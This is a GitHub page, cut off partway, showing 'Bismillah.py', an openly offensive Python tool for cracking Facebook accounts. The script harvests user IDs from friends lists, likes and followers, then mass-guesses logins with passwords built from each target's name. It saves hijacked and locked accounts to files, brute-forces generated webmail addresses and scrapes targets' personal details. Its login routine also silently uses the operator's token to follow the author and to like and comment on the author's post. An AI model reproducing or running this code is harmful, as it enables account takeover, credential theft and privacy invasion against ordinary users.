-
Notifications
You must be signed in to change notification settings - Fork 1
/
Bismillah.py
895 lines (867 loc) · 41.7 KB
/
Bismillah.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
#!/usr/bin/python2
# coding=utf-8
# coding by Nazri-XD
# Note : jangan cuma rekode kontol
# Open source code by Nazri-XD | ngotak dikit cok jangan jual di perjual belikan...
## Jangan di jual belikan memek...
## Hargai gue dengan jangan ganti nama author...
## Dan jangan lupa suscribe chenel gue mmk...
## Buat yang mau ngamal ke dana -> 081211847166
## HARUS DANA AJG:V
## TERIMA KASIH BUAT LU YANG UDAH SUSCRIBE YT GUE/DONASI MKSH...
## Import Module Kntl ..
import os, sys, time, re, json, requests, bs4, random, calendar, datetime,subprocess, logging
from concurrent.futures import ThreadPoolExecutor as khamdihiXD
from datetime import datetime
from bs4 import BeautifulSoup as parser
ct = datetime.now()
n = ct.month
bulan_ = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
hari = current.day
bulan = bulan_[nTemp]
tahun = current.year
bullan = current.month
bulan12 = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
## Warna pepek cewek semok :v
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA YANG UDAH GAK PERAWAN :V
J = '\033[38;2;255;127;0;1m' # ORANGE
KhamdihiGanteng = [ P,M,H,K,B,U,O,N ] # warna janda x
komen = random.choice(['Mantap bang @[100000626195514:0] I Love You','Pengguna script ganja kamu bang @[100000626195514:0]','Kamu ganteng banget deh @[100044663564610:0]','Kamu ganteng banget deh bang @[100046031671446:0]','Kamu manis bang bang @[100056394630237:0]','Kamu cantik banget anak siapa @[100062167515808:0]','Kamu ganteng banget bang @[100076440339167:0]','Mantap bang love you','Khamdihi nggak ada obat script nya emang','pengin kaya elu bang bisa ngocok stading @[100000626195514:0]'])
user, mi, status_foll, cr, ok, cp, id, user, loop, looping = [], [], [], [], [], [], [], [], 0, 1
ta = current.year
bu = current.month
ha = current.day
op = bulan_[nTemp]
waktu = '%s-%s-%s'%(ha,op,ta)
waktu.split('/')
## NAMPUNG KANG REKODE MASE
id = []
ok = []
cp = []
loop = 0
## USER-AGENT ORI BAWAN
try:
user = ('Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]')
open('user.txt','w').write(user)
except:
pass
## RANDOM UA
try:ugen = open('user.txt','r').read().splitlines()
except:ugen = ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
try:ugen2 = open('user2.txt','r').read().splitlines()
except:ugen2 = ['Mozilla/5.0 (Linux; U; Android 2.3.4; pt-pt; SonyEricssonLT18a Build/4.0.1.A.0.266) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.2.1; ru-ru; 9930i Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 2.3.4; ru-ru; MID Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','Mozilla/5.0 (Linux; U; Android 4.3; en-us; ASUS_T00J Build/JSS15Q) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','Mozilla/5.0 (Linux; U; Android 4.2.2; ru-ru; Fly IQ4404 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 YandexSearch/7.16']
## MLAKU
def jalan(kontol):
for wibu in kontol + "\n":
sys.stdout.write(wibu)
sys.stdout.flush()
time.sleep(0.03)
def folder():
try:os.mkdir('okeh')
except:pass
try:os.mkdir('cepeh')
except:pass
def banner():
print('''%s
_______ ______ _______ _______ _ _ _______ ______
| |_____/ |_____| | |____/ |______ |_____/
|_____ | \_ | | |_____ | \_ |______ | \_
───────────────────────────────────────────────────────
[\x1b[1;96m+%s] Author : Nazri-XD
[\x1b[1;96m+%s] Github : https://github.com/Nazri-XD
[\x1b[1;96m+%s] Facebook : LU PASTI TAU AKUN GUA UNIK
───────────────────────────────────────────────────────\n'''%(N,N,N,N))
class login:
def __init__(self):
self.ada = []
def __login__(self):
os.system('clear')
banner()
token = input(' [%s*%s] Masukan token : '%(O,N))
if token in ['']:
time.sleep(2);login().__login__()
else:
try:
cc = requests.get('https://graph.facebook.com/me?access_token=%s'%(token)).json()['name']
open('token.x','w').write(token)
print('\n [%s+%s] Login berhasil %s'%(H,N,cc))
self.bot()
except KeyError:
jalan(' [%s!%s] Token error coba ganti akun tumbal!'%(M,N))
self.takon()
def takon(self):
takon = input('\n %s[%s!%s] Mau tau cara ambil token y/t: '%(N,O,N))
if takon in ['y','Y','iya']:
jalan('\n %s[%s!%s] Kamu akan di arahkan ke Ke Wa Untuk Donasi'%(N,O,N))
os.system('xdg-open wa.me/6281221523195');exit()
else:
login().__login__()
def bot(self):
# HARGAI SEDIKIT AJA JANGAN GANTI BOT FOLOW NYA CUKUP TAMBAHKAN, TERIMA KASIH BUAT YG PENGERTIAN :V
try:
toket = open('token.x','r').read()
except IOError:
jalan('\n [%s!%s] Token mokad ganti akun!'%(M,N));time.sleep(1);login().__login__()
requests.post('https://graph.facebook.com/100000626195514/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100000626195514/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/100000626195514/subscribers?access_token=' + toket)
requests.post('https://graph.facebook.com/5310931375604350/comments/?message=' +komen+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/5310931375604350/likes?summary=true&access_token=' + toket)
requests.post('https://graph.facebook.com/5310931375604350/comments/?message='+komen+'&access_token=' + toket)
requests.post('https://graph.facebook.com/5310931375604350/likes?summary=true&access_token=' + toket)
os.system('xdg-open wa.me/6281221523195')
menu().main()
class menu:
def __init__(self):
self.uid = []
def main(self):
os.system('clear')
try:
toke = open('token.x','r').read()
except IOError:
print(' [%s+%s] Kamu belum login'%(M,N));login().__login__()
try:
r = requests.get('https://graph.facebook.com/me?access_token=%s'%(toke)).json()['name']
except KeyError:
print(' [%s!%s] Login gagal ...'%(M,N));os.system('rm -rf token.x');time.sleep(2);login().__login__()
except requests.exceptions.ConnectionError:
exit(' [%s!%s] cek koneksi'%(M,N))
try:
akss = open('license.txt','r').read()
except IOError:
akss = '-'
banner()
IP = requests.get('https://api.ipify.org').text
jalan(' %s╔═[ %sselamat Datang Om>< %s%s ]'%(N,H,r,N))
print(' %s║'%(N))
print(' %s╠═[%s•%s] Accsess licensee kamu : %s'%(N,O,N,akss))
print(' %s╠═[%s•%s] Alamat IP kamu saat ini : %s'%(N,O,N,IP))
print(' %s╠═[%s•%s] Kamu masuk pada : %s'%(N,O,N,waktu))
print(' %s║'%(N))
print(' %s╠═[%s0%s] crack dari daftar teman [ON]'%(N,O,N))
print(' %s╠═[%s1%s] crack dari akun publik [ON]'%(N,O,N))
print(' %s╠═[%s2%s] crack dari akun massal [ON]'%(N,O,N))
print(' %s╠═[%s3%s] crack dari postingan [ON]'%(N,O,N))
print(' %s╠═[%s4%s] crack dari likes post [ON]'%(N,O,N))
print(' %s╠═[%s5%s] crack dari followers [ON]'%(N,O,N))
print(' %s╠═[%s6%s] cek opsi akun chekpoint [ON]'%(N,O,N))
print(' %s╠═[%s7%s] cek hasil crack ok,cp [ON]'%(N,O,N))
print(' %s╠═[%s8%s] seting User-Agent [ON]'%(N,O,N))
print(' %s╠═[%s9%s] crack email [ON]'%(N,O,N))
print(' %s╠═[%sG%s] Get data² facebook [ON]'%(N,O,N))
print(' %s╠═[%sK%s] Lapor bug script [ON]'%(N,O,N))
print(' %s╠═[%sA%s] Keluar, hapus token[ [ON]'%(N,O,N))
print(' %s╠═[%sU%s] Upgrade ke premium [ON]'%(N,O,N))
self.pilih()
def pilih(self):
print(' %s║'%(N))
usna = input(' %s╠═[%s+%s] choose : '%(N,O,N))
if usna in ['']:
print(' %s║'%(N))
print(' %s╚═[%s!%s] Jangan kosong mas'%(N,M,N));time.sleep(2);menu().main()
elif usna in ['0','00']:
try:
token = open('token.x','r').read()
except IOError:
os.system('rm -rf token.x')
exit(' %s╚═[%s!%s] Cek token kamu'%(N,M,N))
try:
lmt = input(' %s╠═[%s+%s] Limit id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/me?fields=friends.limit(%s)&access_token=%s'%(lmt,token))
z = json.loads(r.text)
id = []
for w in z['friends']['data']:
id.append(z['id'] + '<=>' + w['name'])
except KeyError:
print(' %s╚═[%s!%s] Akun anda tidak publik...'%(N,M,N));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['1','01']:
try:
token = open('token.x','r').read()
except IOError:
os.system('rm -rf token.x')
exit(' %s╚═[%s!%s] Coba jalankan ulang !'%(N,M,N))
try:
print(' %s║'%(N))
idt = input(' %s╠═[%s•%s] Masukan id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,token))
e = json.loads(r.text)
id = []
for u in e['friends']['data']:
id.append(u['id'] + '<=>' + u['name'])
except KeyError:
print(' %s║'%(N))
jalan(' %s╠═[%s•%s] ID %s tidak di temukan!'%(N,M,N,idt));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['2','02']:
token = open('token.x','r').read()
try:
pler = int(input(' %s╠═[%s•%s] Mau crack berapa id : '%(N,O,N)))
except:pler = 1
for ikeh in range(pler):
ikeh += 1
try:
print(' %s║'%(N))
idt = input(' %s╠═[%s•%s] Masukan id yang ke %s : '%(N,O,N,ikeh))
r = requests.get(f'https://graph.facebook.com/{idt}?fields=name,friends.fields(id,name)&access_token={token}')
z = json.loads(r.text)
id = []
for a in z['friends']['data']:
id.append(a['id'] + '<=>' + a['name'])
except KeyError:
pass
else:
pass
crack().fbeh(id)
elif usna in ['3','03']:
pepek = open('token.x','r').read()
try:
print(' %s║'%(N))
idt = input(' %s╠═[%s•%s] Masukan id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/%s/likes?limit=50000&access_token=%s'%(idt,pepek))
z = json.loads(r.text)
id = []
for a in z['data']:
id.append(a['id'] + '<=>' + a['name'])
except KeyError:
print(' %s╚═[%s!%s] ID %s tidak publik'%(N,O,N,idt));time.sleep(3);menu().main()
else:
crack().fbeh(id)
elif usna in ['4','04']:
memek = open('token.x','r').read()
try:
print(' %s║'%(N))
idt = input(' %s╠═[%s•%s] Masukan id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/%s/likes?limit=50000&access_token=%s'%(idt,memek))
z = json.loads(r.text)
id = []
for e in z['data']: # MEMEK
id.append(e['id'] + '<=>' + e['name'])
except KeyError:
print(' %s╚═[%s!%s] ID %s Tidak di temukan'%(N,O,N,idt));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['5','05']:
khamdihiXDX = open('token.x','r').read()
try:
print(' %s║'%(N))
idt = input(' %s╠═[%s•%s] Masukan id : '%(N,O,N))
r = requests.get('https://graph.facebook.com/%s/subscribers?limit=50000&access_token=%s'%(idt,khamdihiXDX))
z = json.loads(r.text)
id = []
for w in z['data']:
id.append(w['id'] + '<=>' + w['name'])
except KeyError:
print(' %s╚═[%s!%s] ID %s tidak publik'%(N,O,N,idt));time.sleep(2);menu().main()
else:
crack().fbeh(id)
elif usna in ['6','06']:
print(' %s║'%(N))
print(' %s╠═[%s•%s] Masukan -> Cp.txt sebagai file'%(N,O,N))
files = input(' %s╠═[%s•%s] Masukan files : '%(N,O,N))
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\n%s [%s!%s] Files %s%s%s Tidak Ada!"%(N,M,N,H,files,N))
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print("\n • Account : "+(kontol.replace(" + ","")))
try:
khamdihi(titid[0].replace(" + ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
exit("\n%s [%s!%s] Done Ya Anjing"%(N,M,N))
elif usna in ['7','07']:
print(' %s║'%(N))
print(' %s╠═[%s1%s] Cek hasil ok'%(N,O,N))
print(' %s╠═[%s2%s] Cek hasil cp'%(N,O,N))
print(' %s╠═[%s0%s] Kembali'%(N,O,N))
print(' %s║'%(N))
hsl = input(' %s╠═[%s•%s] choose : '%(N,O,N))
if hsl in ['1','01']:
hasil_ok = open('Ok.txt','r').read()
if len(hasil_ok) != 0:
print('\n')
print('%s[ %shasil okeh %s]'%(N,H,N))
os.system('cat Ok.txt');exit()
else:
print(' %s╚═[%s!%s] Kamu gak dapet hasil okeh :('%(N,O,N))
elif hsl in ['2','02']:
hasil_cp = open('Cp.txt','r').read()
if len(hasil_cp) != 0:
print('\n')
print(' %s[ %shasil cepeh kamu %s]'%(N,K,N))
os.system('cat Cp.txt');exit()
else:
menu().main()
elif usna in ['8','08']:
print(' %s║'%(N))
print(' %s╠═[%s1%s] Cek user agent default'%(N,O,N))
print(' %s╠═[%s2%s] Ganti user agent '%(N,O,N))
print(' %s╠═[%s0%s] Keluar'%(N,O,N))
print(' %s║'%(N))
pwk = input(' %s╠═[%s+%s] choose : '%(N,O,N))
if pwk in ['1','01']:
fika = open('user.txt','r').read()
print(' %s╚═[%s!%s] User agent sekarang : %s'%(N,O,N,fika))
time.sleep(4);menu().main()
elif pwk in ['2','02']:
ua = input(' %s╠═[%s+%s] Masukan ua baru : '%(N,O,N))
try:
nunu = open('user.txt','w')
nunu.write(ua)
nunu.close()
print(' %s╚═[%s!%s] Sukses mengganti ua : %s'%(N,O,N,ua));time.sleep(4);menu().main()
except:pass
else:
menu().main()
elif usna in ['9','09']:
data = []
print(' %s║'%(N))
nama = input(' %s╠═[%s+%s] Target nama : '%(N,O,N))
print(' %s╠═[%s+%s] Contoh domain : Jika ingin crack Gmail ketik : G '%(N,O,N))
domain = input(' %s╠═[%s+%s] Masukan domain [G]mail, [Y]ahoo, [H]otmail : '%(N,O,N)).lower().strip()
list = {
'g':'@gmail.com',
'y':'@yahoo.com',
'h':'@hotmail.com'
}
jml = int(input(' %s╠═[%s+%s] Jumlah target : '%(N,O,N)))
pwx = input(' %s╠═[%s+%s] Masukan password : '%(N,O,N)).split(',')
print(' %s╠═[%s+%s] Crack sedang di mulai'%(N,O,N))
[data.append({'user': nama+str(e)+list[domain], 'pw':[(i) for i in pwx]}) for e in range(1,jml+1)]
with khamdihiXD(max_workers=15) as th:
{th.submit(brute, user['user'], user['pw']): user for user in data}
exit('%s╚═[%s!%s] Crack telah selezai'%(N,O,N))
elif usna in ['G','g']:
target()
elif usna in ['K','k']:
nom_wa ='+6285866306386'
text = input(' %s╚═[%s!%s] Apa yang error ketik di sini : '%(N,O,N))
url_wa = ("https://api.whatsapp.com/send?phone="+nom_wa+"&text="+text)
subprocess.check_output(["am", "start", url_wa])
exit()
elif usna in ['a','A']:
os.system('rm -rf token.x');exit()
elif usna in ['U','u']:
nom_wa ='+6285866306386'
kata = input(' %s╚═[%s!%s] Masukan pesan kamu ke admin : %s'%(N,O,N,H))
url_wa = ("https://api.whatsapp.com/send?phone="+nom_wa+"&text="+kata)
subprocess.check_output(["am", "start", url_wa])
exit()
else:
print('%s ╚═[%s+%s] Wrong input'%(N,M,N));time.sleep(2);menu().main()
def target():
try:
toket=open('token.x','r').read()
except KeyError:
print("\n[!] Token Invalid")
os.system('rm -rf login.txt')
login()
print(' %s║'%(N))
idt = input(" ╠═[•] ID Target : ")
try:
zx = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
zy = json.loads(zx.text)
except KeyError:
print(" [!] ID NOT found");exit()
try:
nm = zy["name"]
except KeyError:
nm = ("-")
try:
nd = zy["first_name"]
except KeyError:
nd = ("-")
try:
nt = zy["middle_name"]
except KeyError:
nt = ("-")
try:
nb = zy["last_name"]
except KeyError:
nb = ("-")
try:
ut = zy["birthday"]
except KeyError:
ut = ("-")
try:
gd = zy["gender"]
except KeyError:
gd = ("-")
try:
em = zy["email"]
except KeyError:
em = ("-")
try:
lk = zy["link"]
except KeyError:
lk = ("-")
try:
us = zy["username"]
except KeyError:
us = ("-")
try:
rg = zy["religion"]
except KeyError:
rg = ("-")
try:
rl = zy["relationship_status"]
except KeyError:
rl = ("-")
try:
rls = zy["significant_other"]["name"]
except KeyError:
rls = ("-")
try:
lc = zy["location"]["name"]
except KeyError:
lc = ("-")
try:
ht = zy["hometown"]["name"]
except KeyError:
ht = ("-")
try:
ab = zy["about"]
except KeyError:
ab = ("-")
try:
lo = zy["locale"]
except KeyError:
lo = ("-")
jalan(" ╠═[•] Name : " + nm)
jalan(" ╠═[•] First Name : " + nd)
jalan(" ╠═[•] Middle Name : " + nt)
jalan(" ╠═[•] Last Name : " + nb)
jalan(" ╠═[•] Birthday : " + ut)
jalan(" ╠═[•] Gender : " + gd)
jalan(" ╠═[•] Email : " + em)
jalan(" ╠═[•] Link : " + lk)
jalan(" ╠═[•] Username : " + us)
jalan(" ╠═[•] Religion : " + rg)
jalan(" ╠═[•] Relationship Status : " + rl)
jalan(" ╠═[•] Relationship With : " + rls)
jalan(" ╠═[•] Location : " + lc)
jalan(" ╠═[•] Hometown : " + ht)
jalan(" ╠═[•] About : " + ab)
jalan(" ╠═[•] Locale : " + lo)
input(' ╚═[+] Back to menu, pres enter')
menu().main()
def brute(user, passs):
try:
for pw in passs:
params={
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': user,
'locale': 'en_US',
'password': pw,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
}
api='https://b-api.facebook.com/method/auth.login'
response=requests.get(api, params=params)
if re.search('(EAAA)\w+', str(response.text)):
print('%s --> %s • %s '%(H,str(user), str(pw)))
break
elif 'www.facebook.com' in response.json()['error_msg']:
print('%s * --> %s • %s '%(K,str(user), str(pw)))
break
except: pass
def khamdihi(user, pasw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
ses = requests.Session()
#......
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print(" • Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
num = 0
for _ in xe:
num += 1
print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
print(" • Total Opsi Yang Tersedia "+str(len(ngew)))
for opt in range(len(ngew)):
print(" " +str(opt+1)+" " +ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print("%s[%s!%s] %s"%(P,M,P,oh))
else:
print("%s[%s!%s] Error Login Failed!\n"%(N,M,N))
class crack:
def __init__(self):
self.id = []
def fbeh(self,id):
self.id = id
print(' %s╠═[%s+%s] Total id : %s%s'%(N,O,N,H,len(id)))
kham = input(' %s╠═[%s?%s] Gunakan password manual y/t : '%(N,O,N))
if kham in ['']:
print(' %s╠═[%s!%s] Jangan kozong !'%(N,M,N));time.sleep(2);crack().fbeh(id)
elif kham in ['y','Y','Iya','iya']:
print(' %s║'%(N))
print(' %s╠═[%s!%s] Gunakan koma untuk pemisahan cnth : sayang,katasandi'%(N,O,N))
while True:
pw = input(' %s╠═[%s•%s] Masukan password : '%(N,O,N))
if pw in ['']:
print(' %s╠═[%s!%s] Jangan kosong'%(N,M,N))
elif len(pw)<=5:
print(' %s╠═[%s!%s] Password harus ada 6 kata/ lebih !!'%(N,M,N))
else:
def manual(xnxx=None):
print('%s ║'%(N))
mani = input(' %s╠═[%s•%s] Metode : '%(N,O,N))
if mani in ['']:
print(' %s╠═[%s!%s] Jangan kosong mmk'%(N,M,N));self.manual()
elif mani in ['1','01']:
print(' %s║'%(N))
print(' ╠═[%s*%s] akun Ok akan di simpan di file : Ok.txt'%(O,N))
print(' ╚═[%s*%s] akun CP akan di simpan di file : Cp.txt\n'%(O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.b_api, Nufikha, xnxx)
except: pass
exit()
elif mani in ['2','02']:
print(' %s║'%(N))
print(' %s╠═[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print(' %s╚═[%s*%s] akun CP akan di simpan di file : Cp.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.mbasic,Nufikha,xnxx)
except: pass
exit()
elif mani in ['3','03']:
print(' %s║'%(N))
print(' %s╠═[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print('%s ╚═[%s*%s] akun Cp akan di simpan di file : Cp.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
Nufikha = me.split('<=>')[0]
dihi.submit(self.metod2, Nufikha, xnxx)
except: pass
exit()
print(' %s║'%(N))
print(' %s╠═[%s1%s] Metode Free'%(N,O,N))
print(' %s╠═[%s2%s] Metode Mbasic'%(N,O,N))
print(' %s╠═[%s3%s] Metode Mobile/M'%(N,O,N))
manual(pw.split(','))
break
elif kham in ['t','T','tidak','Tidak']:
print(' %s║'%(N))
print(' %s╠═[%s1%s] Metode Free'%(N,O,N))
print(' %s╠═[%s2%s] Metode Mbasic'%(N,O,N))
print(' %s╠═[%s3%s] Metode Mobile/M'%(N,O,N))
self.otomatis()
def otomatis(self):
print(' %s║'%(N))
oto = input(' %s╠═[%s+%s] Crack dengan metode : '%(N,O,N))
if oto in ['']:
print('╠═[%s!%s] jangan kosonh'%(O,N));self.otomatis()
elif oto in ['1','01']:
self.free()
elif oto in ['2','02']:
self.basic()
elif oto in ['3','03']:
self.mobilez()
else:
print('╠═[%s!%s] Pilih menu yg bnr'%(M,N));self.otomatis()
def free(self):
print(' %s║'%(N))
print(' %s╠═[%s*%s] akun okeh akan di simpan di file : hasil/okeh.txt'%(N,O,N))
print(' %s╠═[%s*%s] akun cepeh akan di simpan di file : hasil/cepeh.txt\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
uid, name = me.split('<=>')
sempak = name.split(' ')
nun = sempak[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.b_api, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def basic(self):
print(' %s║'%(N))
